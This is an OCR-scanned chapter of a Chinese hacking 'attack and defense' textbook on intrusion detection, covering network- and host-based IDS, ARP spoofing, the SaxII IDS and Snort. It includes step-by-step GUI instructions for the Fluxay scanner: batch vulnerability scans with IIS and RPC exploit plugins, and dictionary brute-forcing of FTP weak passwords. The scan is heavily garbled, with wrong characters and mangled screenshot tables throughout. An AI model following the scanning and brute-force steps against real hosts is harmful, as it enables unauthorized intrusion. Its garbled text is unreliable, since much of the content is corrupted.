从 安全 的 角度 来 看 ， 包 咒 探 器 所 市 来 的 好 处 很 少 。 抓 获 网 络 上 的 每 个 数据 包 ， 拆 分 该 
包 ， 再 根据 包 的 内 容 手 工 采 取 相 应 的 措施 ， 太 浪费 时 间 ， 有 什么 软件 可 以 目 动 执行 这 些 程 
序 呢 ? 《毕竟 ， 这 是 计算 机 所 做 的 第 一 个 方面 ) 

这 束 是 基于 网 络 的 入 侵 检 测 系 统 的 主要 任务 。 有 两 种 类 型 的 软件 包 可 以 用 来 进行 这 类 
的 入 侵 检 测 ， 即 ISS Real Secure Engine 和 Network Flight Recorder。 

基于 网 络 的 入 侵 检 测 系 统 可 以 识别 各 种 各 样 有 可 能 是 欺骗 攻 击 的 IP。, 将 IP 地址 转化 为 
MAC 地 址 的 ARP 通常 束 是 一 个 攻击 目标 。 如 果 在 一 个 以 太 网 上 发 送 伪 造 的 ARP 数据 包 ， 
一 个 已 经 获得 系统 访问 权限 的 入 侵 者 束 可 以 假 钱 是 一 个 不 同 的 系统 在 进行 操作 。 这 将 会 导 
致 各 种 各 样 的 拒绝 服务 攻击 ， 也 叫 系 统 劫持。 入 侵 者 可 以 使 用 欺骗 攻 击 将 数据 包 重 定 癌 到 
目 己 的 系统 中 ， 同 时 在 一 个 安全 的 网 络 上 进行 中 间 类 型 的 攻击 来 进行 欺骗 。 

通过 对 ARP 数据 包 的 记录 , 基于 网 络 的 入 侵 检 训 系 统 束 能 识别 出 受害 的 源 以 太 网 地 址 
和 判断 是 人 否 是 一 个 破坏 者 。 当 检测 到 一 个 不 希望 看 到 的 活动 时 ， 基 于 网 络 的 入 侵 检 测 系 统 
将 会 采取 行动 ， 包 括 干涉 从 入 侵 者 处 发 来 的 通信 或 重新 配置 附近 的 防火 场 策略 ， 来 封锁 从 
入 侵 者 的 计算 机 或 网 络 发 来 的 所 有 的 通信 。 


9.3 ”基于 主机 的 入 侵 检 疯 系统 


基于 主机 的 入 侵 检 测 ， 这 种 类 型 的 入 侵 检测 系统 运行 在 需要 监视 的 系统 上 。 它 们 监视 
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系统 并 判断 系统 上 的 活动 是 侍 可 接受 。 如 末 一 个 网 络 数据 包 已 经 到 达 它 要 试图 进入 的 主机 ， 

要 想 准 确 地 检测 出 来 并 进行 了 胆 止 ， 除 防火 墙 和 网 络 监 视 占 外 ， 还 可 用 第 三 道 防线 ， 即 “ 基 
于 主机 的 入 侵 检 测 ” 其 入 侵 检测 结构 如 下 图 所 示 。 








攻击 模式 库 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 1 





基于 主机 的 入 侵 检 测 结构 


两 种 基于 主机 的 入 侵 检 测 类 型 如 下 。 
@ 网 络 监 视 器 。 它 监视 进来 的 主机 的 网 络 连接 , 并 试图 判断 这 些 连接 是 否 是 一 个 威胁 ， 
并 可 检 醋 出 网 络 连接 表达 的 一 些 试 图 进行 的 入 侵 类 型 。 记 住 ， 这 与 基于 网 络 的 入 侵 
检测 不 同 ， 因 为 它 只 监视 它 所 运行 的 主机 上 的 网 络 通信 ， 而 不 是 通过 网 络 的 所 有 通 
信 。 基 于 此 种 原因 ， 它 不 需要 网 络 接 口 处 于 泥 杀 模式 。 
@ 主机 监视 右 。 它 监视 文件 、 文 件 系 统 、 日 志 或 主机 其 他 部 分 ， 查 找 特 定 类 型 
的 活动 ， 进 而 判断 是 否 是 一 个 入 侵 企图 (或 一 个 成 功 的 入 侵 )， 之 后 通知 系 
统管 理 员 。 
1. 监视 进来 的 连接 
在 数据 包 到 达 主 机 系统 的 网 络 层 之 前 ， 检 全 试图 访问 主机 的 数据 包 是 可 以 的 。 这 种 机 
制 试 独 在 到 达 的 数据 包 能 够 对 主机 造成 破坏 之 前 ， 鹤 获 该 数据 包 而 保护 该 主机 。 
可 以 采取 的 活动 主要 有 以 下 两 种 。 
@ 检测 试图 与 未 授权 的 TCP 或 UDP 端口 进行 的 连接 。 如 条 试 图 连接 没有 服务 的 端口 ， 
这 通关 表明 入 侵 者 在 搜索 售 找 漏洞 。 
@ 检测 进来 的 端口 扫描 ， 并 给 防火 墙 发 管 告 或 修改 本 地 的 卫 配置 以 拒绝 从 可 能 的 入 
侵 者 主机 来 的 访问 。 
可 以 执行 这 种 监视 类 型 的 两 种 软件 产品 分 别 是 ISS 公司 的 Real Secure 和 Port 
Sentry。 
2. 监视 登录 活动 
尽管 管理 员 已 绎 尽 了 了 最 大 努力 ， 同 时 刚刚 配置 并 不 断 检 和 售 入 侵 检 测 软件 ， 但 仍然 可 能 
有 某 些 入 侵 者 采取 未 知 的 入 侵 攻 击 方法 来 进入 系统 。 一 个 攻击 者 可 以 通过 各 种 方法 《〈 包 嘿 
探 器 或 其 他 ) 获得 一 个 网 络 蜜 但， 从 而 有 可 能 进入 该 系统 。 
伍 找 系统 上 的 异常 活动 是 Host Sentry 类 软件 的 工作 。 这 种 类 型 的 包 监 视 器 答 试 登录 或 
退出 ， 从 而 给 系统 管理 员 发 送 警 告 ， 该 活动 是 不 一 般 的 或 不 希望 的 。 
3. 监视 Root 的 活动 
获得 要 进行 破坏 的 系统 超级 用 户 (Root) 或 管理 员 的 访问 权限 ， 是 所 有 入 侵 者 的 目标 。 
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个人 人 他 
除了 在 特定 的 时 间 内 对 系统 进行 定期 维护 外 ， 对 如 Web 服务 器 或 数据 库 服 务 器 进行 展 好 的 
维护 和 在 可 知 的 系统 上 对 超级 用 户 进行 维护 ， 通 币 是 几乎 没有 或 很 少 进行 的 活动 。 但 入 侵 
者 不 信任 系统 维护 ， 他 们 很 少 在 定期 的 维护 时 间 工 作 ， 而 是 经 常 在 上 面 进行 很 长 时 间 的 活 
动 。 他 们 在 该 系统 上 执行 很 多 异 第 操作 ， 有 时 候 比 系统 管理 员 的 都 多 。 

4. 监视 文件 系统 

一 旦 有 入 侵 者 侵入 了 系统 ， 束 要 改变 系统 的 文件 。 如 ; 一 个 成 功 入 侵 者 可 能 想 要 安 猴 
一 个 包 虽 探 右 或 者 关口 扫描 检 训 器 ， 或 修改 一 些 系统 文件 或 程序 ， 以 舱 避 对 他 在 周围 进行 
的 入 侵 活动 的 检测 。 在 一 个 系统 上 安装 软件 通常 包括 修改 系统 的 菏 些 部 分 ， 这 些 修改 通常 
是 要 修改 系统 上 的 文件 或 库 。 


























9.4 基于 漏洞 了 入侵 检 测 系统 


墨客 利用 漏洞 进入 系统 ， 再 悄然 离开 ， 系 统管 理 员 对 整个 过 程 可 能 室 无 察觉 ， 等 黑客 
在 系统 内 明 作 非 为 后 再 发 现 已 为 时 过 晚 。 为 防 患 于 未 然 ， 应 对 系统 进行 扫描 ， 奴 现 漏 调 及 
时 补救 。 流 光 对 于 国内 的 安全 爱好 者 们 来 说 可 以 说 是 无 人 不 晓 ， 它 不 仅仅 是 一 个 安全 漏洞 
扫描 工具 ， 更 是 一 个 功能 强大 的 渗透 测试 工具 。 流 光 以 其 独特 的 C/S 结构 设计 的 扫描 设计 
兢 得 好 评 。 











9.4.1 运用 流光 进行 批量 主机 扫 揪 


演 交 的 功能 较 多 ， 所 以 对 初学 者 来 说 略 显 复杂 ， 所 牌 ， 这 个 过 程 需 要 的 时 间 不 会 太 久 。 
下 面 将 评 细 讲述 用 流光 扫 插 主机 漏洞 的 方法 ， 上 其 体操 作 步 又 如 下 。 








STEP01: 运行 “流光 ”软件 STEP02: 打开 “设置 ”对 话 框 


加 小 榨 软 件 - [流光 5.0】 Build 3310 (26 用 户 ) 
编辑 (E) “查看 (V) 探测 (R) 选项 (QO) 工具 (T) 帮助 (H) 关于 (A) 


| 起 高 级 扫 档 和 内 SB 、 Ctr+w | 
、 
门 新 建 项 目 (N) Ctrl+N 起 始 地址 : |192.168.0.1 
蕊 打开 项 目 (O).. Ctrl+O a | 结束 地 址 : |192. 168.0. 255 
« uN Lt 3 


园 项 目 保 #®) Ctrl+s 目标 系统 : 到 
的 获取 主机 名 Dj FTNG 检 查 


项 目 另 存 为 (A)... Ctrl+Shift+S 
上 次 最 过 项 目 贞 
晤 探测 结果 


回 纹 FORTS 
探测 历 实 记 录 》 有 2 小 榕 作品 国信 FOP3 
| | 主 # 回 绍 FTP 


回 汶 SNWTP 
回 狼 IN 


Fa es TRT WRT 

















选择 “文件 ” >“ 高 级 扫描 向 导 ” 菜单 命令 或 按 输入 起 始 IP 和 终止 |P， 名单 击 “ 下 一 
《Ctrlt+W> 组 合 键 。 将 “目录 系统 ”设置 为 步 ”按钮 。 


“Windows NT/2000”。 
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STEP03: 打开 “PORTS” 对 话 框 


咒 标准 端口 扫描 


四 自 定 庙 口 扫 掏 范围 





从 Pa 到 Ps 


“上 一 步 | 血 ) | 下 一 步 ) > 取消 帮助 
| | 
单 击 “ 下 一 步 "按钮 。 





指定 扫描 的 端口 


STEP05: 打开 “TELNET” 对 话 框 


四 获取 系统 版 本 


口 SunDs Login 这 栓 滨 出 


TT 疝 | 、 
取消 义 选 单 击 “ 下 一 步 ”按钮 。 


STEP07: 依次 确认 


MISC 


依次 单 击 “ 下 一 步 ” 按 钮 。 
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STEP04: 依次 确认 
POP3 lS 


本 RE 


FTP 


因 


SMTP 


rE 


IMAP 













因 获得 za 全 版 本 信息 
因 尝试 稀 角 用 户外 号 









依次 单 击 “ 下 一 步 ” 按钮 。 


STEP06: 打开 “CGI Rules” 对 话 框 











后 向 选 择 @) 
《上 一 步 名 过 过 吾 | dE l 


单 击 “ 下 一 
步 ” 按 钮 。 








选择 “Windows NT/2000” 
项 ， 根 据 需 要 勾 选 具体 选项 。 


STEP08: 打开 “PLUGINGS” 对 话 框 


Windows NT/2000 共计 [0011] 个 插件 
描述 | | 类 型 


[w] CCProxy [6.2 Exploit 

网 FrontFage 2000 Extension Exploit 

[Ww] FTP Seryer 

网 IIS 5.0 IWEBDAY Exploit 

[w] IIS5.0 HULL. Frinter Exploit 

[¥] NULL Seysion hwaliable 

[vw] SMB Get Ds 

哆 Windows 2000 FFC Locator Remote Exploit 





当当 当当 当当 当 汪 


Ey 
< 上 - 步 串 [二 本 引 取消 “| || 帮助 


选择 “Windows NT/2000” 单 击 “ 下 一 
选项 。 步 ” 按 钮 。 





了 





取 





ee > 
全- 攻防 从 入 门 到 精通 


售 人 他 他 





STEP09: 打开 “选择 流光 主机 ”对 话 框 STEP10: 程 友 开 始 打 描 


选择 流光 主机 Lh A Ss) 国 小 榨 软 件 - [流光 5.0】 Build 3310 [26 用 户 ) 


文件 (F) ”编辑 (E) 查看 (V) 探 弄 (R) 选项 (O) 工具 (T) [部 助 (4 一 关 3 


-一 一 一 一 日 回归 目标 主机 
~ 经 Tn - | 守 攻 这 per3 主 机 和 
主机 [ERE5J ”|j| 详情 WwW | 端口 : 555 | rs 
用 户 名 : ”|LocalHost 室 码 : 

















人 4 显示 所 有 项 目 


， 一口 鲍 PRoxy 主 机 
| 口 加 FoRM 主机 




















国 小 榨 次 件 江 验 宝 1995- 避 02 小 榕 作品 版 权 所 有 
| 密码 ||| 主机 





单词 (102)/100/100 探测 速度 


单 击 “开始 ”按钮 。 可 碍 看 正在 扫描 的 内 容 。 








© 流光 的 扫描 引擎 既 可 以 安装 在 不 同 的 主机 上 ， 也 可 以 直接 从 本 地 启动 。 如 
果 没 有 安装 过 任何 扫描 引擎 ， 流 光 将 使 用 默认 的 本 地 打 描 引擎 。 


提示 





STEP11:” 当 扫描 到 安全 漏洞 时 流光 会 弹出 一 个 “探测 结果 ”窗口 ， 在 其 中 可 以 看 到 能 够 
连接 成 功 的 主机 和 其 扫描 到 的 安全 漏洞 信息 。 


0.4.2 运用 流 苑 进行 指定 漏洞 扫描 


很 多 时 候 并 不 需要 对 指定 主机 进行 全 面 的 扫描 ， 而 是 根据 需要 对 指定 的 主机 漏洞 进行 
扫描 。 比 方 说 ， 只 想 扫 描 指 定 主 机 是 否 具 有 ETP 方面 或 者 CGI 方面 的 漏洞 等 。 
具体 的 操作 步骤 如 下 。 


STEP01: 加 入 需要 破解 的 站 点 名 称 STEP02: 打开 “添加 主机 ”对 话 框 

















加 小 榕 坎 件 - 【流光 5.0】 Build 3310 (26 用 户 ) 
文件 (FP ”编辑 (E) ” 童 看 (V) 探测 (R) 选项 (O) 工具 (T) 帮助 (H) 关于 (A) 
| -| 榕 软件 -流光 5.0 人 C 


| 一 回 芝 显示 所 有 IE ^ ‘or Dreams, spedalThank | 192.168.0,10| 
本 = 剖 IMAP 主机 Sn 
，… 口 久 





六 自动 更 新 主机 列表 他) 因 使 用 自动 完成 功能 多 








右 击 “FTP 主 机 ”， 在 快捷 菜单 中 选择 “编辑 " 输入 远程 主机 的 加 单 击 “ 确 定 " 按钮 。 
“添加 "命令 。 域名 或 |P 地 址 。 
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STEP03: 添加 用 尸 和 黎 码 的 字典 STEP04: 打开 “打开 ”对 话 杠 


辆 小 榨 软 件 - [流光 5.0】 Build 3310 (26 用 户 ) Eo 加 打开 

文件 (编辑 (E) 查看 (V) 探测 (R) 选项 (O) 工具 (T) 帮助 (H) 关于 (A) 查 技 革 国 上 :| 上 nor "|< 和 揣 弛 国 

探测 记录 查找 : | = I ji | | i | 
| 日- 回 闪 EP 二 3 


/ LOSma | 编辑- 
- 口 剖 PROXY 主 机 有 | | 1! | 外 


从 列 雪 添加 ... SetupNet.。 SetupPcap signatures Snifferlog ”SqlRcmd Tools 
ys 案 流 > > 入 有 








errors Exploit FluxaySen... Help Install OCX in Reports 





brute,dic brute.ukt ”chinalife,dic chinese.dic en.dic Name.dic | Normal.dic password.... 








小 榕 软件 实验 室 1995-2002 小 榕 作 品 版 权 所 有 


去 Py.dic single.dic Sys_Mont,., Sys YearDic userult Wordsdic words-en. 
密码 | 在 机 


wsm: fie [ogg 
文件 类 型 0) | 用 亡 绿 文件 可 ms | 


右 击 “192.168.0.10”， 在 快捷 菜单 中 选择 “编辑 ” ”在 流光 安装 目录 中 选择 Name 文 件 , 单 击 “ 打 开 ” 按 钮 。 
>“ 从 列表 添加 " 命令 。 














STEP05: 双击 “显示 所 有 项 目 ” 项 STEP06: 选用 用 尸 名 















图 小 榕 软件 - 【流光 5.0】 Build 3310 (234 用 户 ) 
文件 (] ”编辑 (E) 前 看 (V) 探测 (R) 选项 (O) 工具 (T) 帮助 (H) 关于 (A) 
探 出 记录 查找 ; M4 
日 -回电 0: 帕 装 \Fluxay\brute,dic 
| 团 吕 显示 所 有 项 目 
口 吕 | IMAP 主机 
日 -回合 FTP 主机 
器 - 口 昌 192.168.0.10 


图 小 榨 次 件 - 【流光 5.0】 Build 3310 (234 月 户 ) “汪汪 - — 文生 
文件 (F) ”编辑 (E) 这 看 (V) 探测 (R) 选项 (QO) 工具 (D) 帮助 (H) 关于 (A) 
探 齐 记录 查找 :| = 





























外 EE i 
加 LS 


i 口交 ? Ep 
| 口 图 FoRM 主机 
一 口 荡 ssQu 主机 
5- 口 弛 辅助 主机 
口 思 sMrp 主机 











一 用 户 单词 线程 探测 速度 | 




















"显示 所 有 项 目 ” 项 将 切换 成 “隐藏 所 有 项 目 ” 马 页 ， 过 复 选 框 来 决定 用 户 名 的 选用 与 否 
而 用 户 列表 中 的 所 有 用 户 都 将 显示 出 来 。 


STEP07: 按 《CtrlitF7〉 快 捷 键 ,流光 开始 FTP 的 弱 口 令 探 测 。 当 流光 探测 到 
弱 口 令 后 ， 在 主 窗口 下 方 将 会 显示 探测 出 的 用 己 名 、 窗 码 和 FTP 地址 。 
9.5 ” 联 客 断 和 侵 检 测 系统 


隘 客 呆 入 侵 检 测 系 统 基 于 协议 分 析 ， 采 用 了 快速 的 多 模式 匹配 算法 ， 能 对 当前 复 
Re 快速 精确 分 析 。 在 网 络 安 全 和 网 络 性 能 方面 可 以 提供 全 面 和 深入 的 
数据 依据 ， 是 企业 、 政 府 、 学 校 等 机 构 进 行 多 层次 防御 的 重要 产品 。 有 共 体 的 操作 步骤 
如 下 。 


2 





加 > 





攻防 从 入 门 到 精通 


ee 
& 
本 


STEP01: 运行 萨 客 晰 入 侵 检 测 系统 STEP02: 打开 “设置 ”对 话 框 





EE SaxII 入 避 松 测 朱 统 (评估 版 ) 
有 编 缉 加 er 设置 回 ”帮助 和 技术 过 反 轩 


© 国治 
jf 通 Ha 葡 选项 规则 局 
控 节 点 浏览 a “ 研 计 信息 | 会 话 | 入 侵 事 件 | 日志 
观 控 节 点 浏览 * | 四 | 图 国 - 
名 | 按 移 理 节点 浏览 0) 























统计 项 目 

二 数据 包 较 计 
<64 
65-127 
128-255 
256-511 
S12-1023 
1024-1517 




















., 


选择 tt 监控 ” > “开始 ” 菜 六 命令 。 





因为 该 检测 系统 是 通过 适配器 来 捕 所 网 络 中 正在 传输 的 数据 并 对 其 进行 
析 的 ， 所 以 正确 选择 网 卡 是 能 够 捕捉 到 入 侵 的 关键 一 步 ， 


提示 





STEP03: 对 主机 进行 监控 STEP04: 切换 至 “会话 ”选项 卡 


工 从 食 拉 加 于 蒜 主攻 茧 
文件 但 ”站 奖 旧 视图 WW。 监 控 人 D) 设 重 加 条 助 和 技术 支 皇 辐 


于 :ax:II 和 所 食 共 出 未 先生 估 总 ) 
文件 器 ”编辑 日 ”视图 凯 。 监 控 加 ) ”设置 加 帮助 和 技术 支持 是 3 国 ©| 吕 加 
D 
打开 保存 停止 ” 适 院 器 选项 E 
~ 搓 计 信息 ”会 话 ”入 绿 事 诈 | 日 志 
讽 按 节点 浏览 #4 xX | 史上 中 | 固 - 国 . 
习 名 按 物 理 节 点 浏览 上) I D1 72 
® Wl :00:28:73:2D:BA (8) 123. 5 116 199 i 1.0 所 
We} 00: 15:58;6A:04: 79 (92,160. 
WE} 00:18:8C.17:00.77 (ge 168 | e166.0.66 2 91. 1 
We} 00:0C:78.98- BC-02 (2.168. 1 闪 . 166.0 的 216 07 155 117 
BW 01:00:5E:01:01:01 (24,1,1.) 1%.168.0 .66 118 249. 163. 34 
1 区 .10 本 118 249. 163.34 
1 区 .1650 本 118 249. 163. 34 
1 划 .1 名 .0. 栈 1 15. 1. 1 
192.163.0.66 123. 149. 118. 10 
192.168.0.68 81.155. 52. 102 
192.168.0.68 81.155. 52. 102 
192.160.0.66 61.155. 52. 102 
192.160.0.66 114. 223.21. 190 
1 芝 -1660 基 17 865 16 刀 
1 本- T7274 而 
1 1 08 255 255. 255. 25 
1 区- 本 Ze 10%.231- 16 


自 蚂 目 - 国 3190|S|@ 


党 .| © CE 习 
打开 保存 停止 “适配器 选项 = 
统计 入 息 | 会 话 | 入侵 事件 “日志 








状态 

ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISKED 
ESTABLISYE? 
ESTABLISKED 
FESTABLISKED 
ESTABLISHED 
ESTABLISHED 
ESTAILISHED 
ESTAPLISHED 
ESTABLISHED 
ESTABLISKED 
ESTABLISKED 


和 i 08.00:28.73.20.BA (14) 
a 00:15:50:6A:D4:F6 (192.168. 
Be) 00:18:8C:17:B0:77 (192. 168. 





512-1023 
1024-1517 
3=1518 
二 ”TCP 连接 
初 冶 化 的 TCP 连 接 
成 巧 建立 的 TCP 注 接 
被 拒 怒 的 TCF 注 接 
强行 断 开 的 TCR 坟 按 
一 FIP 分 析 
FT?P 控 制 这 接 数 


可 以 查看 检测 到 主机 的 IP 地 址 及 对 应 的 MAC 地 二 可 查看 监控 时 进行 会 话 的 源 
等 信息 。 IP 地 址 、 目 标 闯 口 等 信息 。 





司 加 昌 同 司 富 司 司 和 色 司 名 晤 是 司 司 罚 














P 地 址 、 源 问 口 、 目 标 


STEP05: 分 类 查看 会 话 信息 STEP06: 打开 “增加 别名 ”对 话 框 


民 术 抽 东 拱 评 作 各 
文件 F) 编辑 (E) ”总 图 NV】 上 控 (0) 设置 (51 加 镭 和 技术 支持 9 


这 国 四 | 时 加 
打开 保存 序 止 通 肝 名 过 项 加 
ER 于 人 息 ” 会话 入 民 由 件 


121 223 253 21 
123. 143. 129.21 
221 227.240 12 
123. 16). 146.3 
80.179. 185. 45 
219.74. 53.57 

123 S54 133 五 
i 54.133. 各 
12. 04.1D.5 
124 223 101 20 


Brmowoown nm ~- lO 


123 52.118., 159 192. 1653.0. .上 
网 | 165 0 上 2 121 9 208 172 
1%2 163.0 的 117. 31. 65. 168 


到 
由 日 





加 右 击 某 条 信息 , 选择 国 右 击 节点 物理 地 ”在 “别名 ”文本 框 中 输入 名 称 之 后 ， 单 击 “ 确 定 ” 
“ 按 源 节 点 进行 过 滤 ” 命 址 , 选择 “增加 别名 ” ”按钮 。 
令 , 即 可 按 源 |P 地 址 显示 。 命令 。 


ZZ 会 话 信息 “NO 
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STEP07: 查看 物理 地 址 名 称 


pl EE 


文件 E) ” 久 辑 E) ”视图 VW 些 控 (0) ”设置 (5) ”和 天 助 和 技术 支持 中 


了 由 园 € | 到 了 马 
打开 保存 停止 | 适配器 选项 规 咱 局 
| 授 节 点 浏览 


日 冯 | 按 物理 节点 浏览 2) 

由 于) 05:00:2E:73:20:BA (59) 
本 忆 00:15:58:8A. 74:F8 (192. 
By 00:1z:8C:17:30:77 (192, 

i00:0C:78:9F: BC:02 (192 
By 01:00:5E:01:01:01 
By 00:1E:8C:17.30:85 
到 00:01:6C:B3:51:0F 
By 0:1B:FC:88.30:FF 
By 01:00:5E:4C:7B:4A 
训 01:00:5E: 40: FB:93 
01:00 SE:87 51:ED 
yy 01:00.5E:7B.62:28 
DD 01:00:SE:O1:7A:ALl 
到 01:00:5E:5D. 80:37 
Ey 01:00.SE.18. 4B:33 
DD 01:00:5E: 42: 4B:07 


查看 该 物理 地 址 刚 自 定 义 的 名 称 。 


STEP09: 切换 至 “日 志 ” 选 项 卡 


锚 5:II 八 促 检 测 系 坑 ( 评 估 版 ) 








We 7 7 EE 





| 响 旧 | 辐 * 且 ， 


— El 


| 192.168.0.8 


哺 口 1 | IF2 
B88BB 224.1.1.1 


交 件 但 ”编辑 加 ”视图 包 监 榨 D) 设置 人 帮助 和 技术 支持 时 


. 


羽 ”加 © EE 
打开 保存 | 开始 停止 适配器 针 项 规则 国 


控 节 点 训 完 


哎 按 5 上 6 洲 览 @@ 辐 分 ?>x 





统计 信息 | 会话 | 入侵 事 忻 ”日 志 





日 误 ! 按 物 理 节点 浏览 6) 


到 00:15:58:84:04:F8 (192.1S 


By 06:;00.2E:73:2D:BA G72) 


] 


124. 226 .101. 20 
123. 52. 118. 159 
121. 9. 209. 172 
117. 91. 85. 168 
周 121. 33. 105. 195 
四 219 133. 48. 万 
125. 121.97. 254 
EB 123. 52. 36. 43 





应 用 层 
图 HTP 请 3 
较 邮 从 


a 


人 多 QQ 事务 
注 MSN 事务 





2009-08-07 
2009-06-07 
2009-06-07 
2009-08-07 
2009-05-07 
2009-08-0T 
2009-08-0T 
| 2009-05-07 
2009-08-07 
2009-08-07 
2009-08-07 
2009-08-07 
2009-08-07 
2009-08-07 
2009-08-07 
2009-08-0T7 





Livesrvr 


qotps 
tchdognt 
2725 
2725 
2T25 
raidplus 
2732 
enet-ctf 
tams 
on-msner 
software 
allaeent 
sadr 
-econtrol 
natiq-me 





单 击 “ 自 定义 列 ” 按 钮 ， 自 定义 日 志 的 显示 格式 。 


STEP11: 


志 :seTT 和 食 检 训 手 二 鲜 估 版 ) 


文件 如 ”编辑 全 视图 久 。” 败 榨 亿 ) 


六 


所 O 
打开 保存 1 开始 停止 


三] 按 节 点 浏览 
韶 按 物 理 节点 训 览 (0) 


1024-1517 
S1518 
TC7 连 撤 


返回 主 界 面 


初始 化 的 TCT 注 按 
成 功 尘 立 的 TCP 连 按 
被 拒 颖 的 TCT 往 控 
强行 断 开 的 TCT 连 接 


FTF 分析 


TT? 控 币 宇 按 数 


DD 


全 全 
今 








勾 选 相应 的 复 选 框 。 


黑客 入 侵 检测 技术 


STEP08: 在 “入 侵 ” 选 项 卡 下 查看 事件 


ER NE ET 
文件 亿 ”编辑 但 视图 WW 监控 (D) ”设置 (中 。 帮助 和 技术 支持 叫 


成 ” 国 人 了 刀 回 
打开 保存 停止 ”适配器 选项 时 
控 节 点 浏览 < 镀 计 信息 | 会 话 ” 入 侵 事 件 | 日 志 
绢 | 按 节点 浏览 全 加 和 令 9 x 
日 钻 校 物 理 节 点 浏览 它 2) 
由 . 国 ? 08:00:2E:73;2D:BA 
Bl 00:15:58:BA:D4:FB 
BW) 00:1P:8c:17:B0:77 
By 00:00:78:9F:BC:02 (2. 网 络 入 慷 
Be 01:00:5g:01:01:01 tz24. 入 侵 服 务 
BB 00: 1E:8C:17:B0:85 
DD 00:01:6C:83:51:0F 
加 D00: 1B:FC:88.3D:FF 
BB 01:00:5E: 4C:7B:4A 
BB 01:00:585:40:F3:93 
国 01:00:5E:67:51:ED 
BB 01:00:5E:7B8;82:28 
BB 01:00:SE:01.7A:.AL 
BB 01:00:5E:5D:E0:37 
加 01:00:5E:18:48:33 
BB 01:00:5E:42:48:07 
EB) 01: 00:5E:45.84:F3 
Ee) 00: 43 各 
Wh 


如 果 存 在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 ， 则 
在 此 可 看 到 入 侵 事 件 的 详细 信息 。 





所 有 的 入 侵 事 社 
军 规 入 信 








’ 


STEP10: 打开 “表格 显示 定义 ” 


列 名 
日 期 
2 | 
端口 1 | 
端口 2 | | 
请 求 网 址 
请 求 方法 
代理 
参考 
内 容 长 度 
内 容 类 型 
状态 玛 
服务 器 响应 
帐号 
协议 
平均 速度 
持续 时 间 






































KIIKIODODRKIEKONNN KK KK KI KI KO 








单 击 “ 确 定 " 按钮。 


STEP12: 打开 “详细 设置 ”对 话 框 


迟 :这 机 
日 .二 分 析 模 块 

:< 入侵 分 析 器 
豪 FTF 分 析 器 
* 训 HTTP 分 析 器 
< 和 Email 分 析 器 
< MSN 分 析 器 
< 委 900 分 析 器 


加 | 显示 物理 地 址 别名 
显示 IF 地 址 别名 


显示 端口 地 址 别名 











公 选 相应 的 复 选 框 , 展开 “分 析 模 块 "中 的 各 个 子 项 。 
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> 





攻防 从 入 门 到 精通 





STEP13: 选择 “入 侵 分 析 器 ”选项 SI ld 





只 0 分 析 器 











Re 
设置 是 否 启 用 国 单 击 “确定 ， 选择 “设置 ”>“ 别 名 设置 ”菜单 命令 。 
日 志 等 。 按钮 。 

STEP15: 打开 “别名 设置 ”对 话 框 STEP16: 返回 主 界面 


Er 











物理 地 址 
iD0:0C; 76:9F;BC:02 














ooooooo 扩 








对 物理 地 址 、IP 地 址 、 闪 口 进行 各 种 操作 ， 如 添加 、 ”选择 “设置 ” >“ 检测 规则 设置 ”菜单 命令 。 
编辑 、 删除 、 导出 等 。 


STEP17: 打开 “入 侵 规 则 设置 ”对 话 框 


第 损 入 保 ” 同乡 入 侵 | 入 侵 服 务 “ 网络 病毒 | CGI 入 侵 | 敏感 内 容 | 自 定 义 
隐 虽 日 | 国 | / 


大 小 写 被 榨 济 . .| 响应 方式 阻 断 方式 警 肯 ... 
理 过 户 丹 记 系 日 志 并 阳 断 所 发送 主机 不 可 大 工 一 般 


140 
202. 101. 143. 0-202. 255. 255. 255:10.0.0.0-10.0.0.255 

VERSION [OA| 和 否 全 部 记录 日 志 并 阳 断 后 复位 发 送 端 下 要 
202. 101. 143. 0-202. 255. 255.255;10.0.0. 0-10.0. 0.255 

Es 


1 
黎 户 端 。 “记录 日 志 并 阴 断 全 发 送 主机 不 可 达 工 一般 
202. 101. 143. 0-202. 255. 255.255;10.0.0.0-10.0.0.255 


2 否 客户 铀 ” “记录 日 志 并 组 断 合 发 送 靖 口 不 可 达 工 一 般 可 对 各 种 入 侵 规 则 进 行 湛 示 加 规则 和 删 除 规 则 、 增 加 
i 二 发 送 主 机 不 可 达 It 一 选 项 、 删 除 选 项 等 O 


202. 101. 143. 0-202. 255. 2S5. 255;10.0.0. 0-10.0.0. 255S 
3344 


3345 

了 硬 画 串 6 上 001 否 全 部 记录 日 志 并 阴 断 全 克 详 发 送 靖 于 要 
202. 101. 143. 0-202. 255. 255. 255;10.0.0. 0-10. 0. 0. 255 

计 


2 
[I 4| 是 客户 英 记录 日 志 复位 发送 端 一 最 
202. 101. 143, 0-202. 255. 255.255;10.0.0. 0-10.0. 0. 255 

ST14 


于 又 村 江村 日 末 六 碍 姑 全 二 应 几 涝 这 再 更 
吕 














该 检测 系统 可 检测 出 用 户 网 络 中 存在 的 黑客 入 侵 、 网 络 资源 洲 晴 虫 攻击 、 后 门 森 
马 、ARP 其 骗 、 拒 绝 服 务 攻 击 等 各 种 威胁 ， 同 时 ， 可 以 根据 入 8 略 配置 主动 切断 危险 行为 ， 
对 目标 网 络 进行 保护 。 

9.6 ”Snort 入 侵 检测 系统 
Snort 是 一 个 基于 libpcap 的 轻 量 级 网 络 入 侵 检 测 系统 ， 可 记录 所 有 可 能 的 入 侵 企 图 。 
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< 第 9 章 
黑客 入 侵 检 测 技 术 


记录 信息 的 文件 可 以 是 文本 、XML、 libpcap 格式 , 也 可 以 把 信息 记录 到 syslog 或 数据 库 中 。 


0.6.1 ”Snort 的 系统 组 成 


Snort 运行 在 一 个 “传感器 ”(S$Sensor) 主机 上 ， 可 监听 网 络 数据 。Snort 还 是 一 个 目 由 、 
全 了 易于 扩展 的 入 侵 检 测 系统 , 已 经 被 移植 到 各 种 平台 中 , 如 Windows 0 UNIX 
平台 Snort 的 主要 功能 有 三 种 : 数据 包 咒 探 右 、 数 据 包 记录 器 和 网 络 入 侵 检 测 。 

Sa 主要 由 如 下 儿 部 分 组 成 。 

1. 数据 包 解 码 器 

数据 包 解 码 占 主要 是 对 各 种 协议 栈 上 的 数据 包 进 行 解析 、 预 处 理 ， 以 便 提交 给 检测 引 
擎 进行 规则 匹配 。 

仿 测 引擎 

Snort 用 一 个 二 维 链表 存储 其 检测 规则 ， 一 维 称 为 规则 头 ， 另 一 维 称 为 规则 选项 。 规 则 
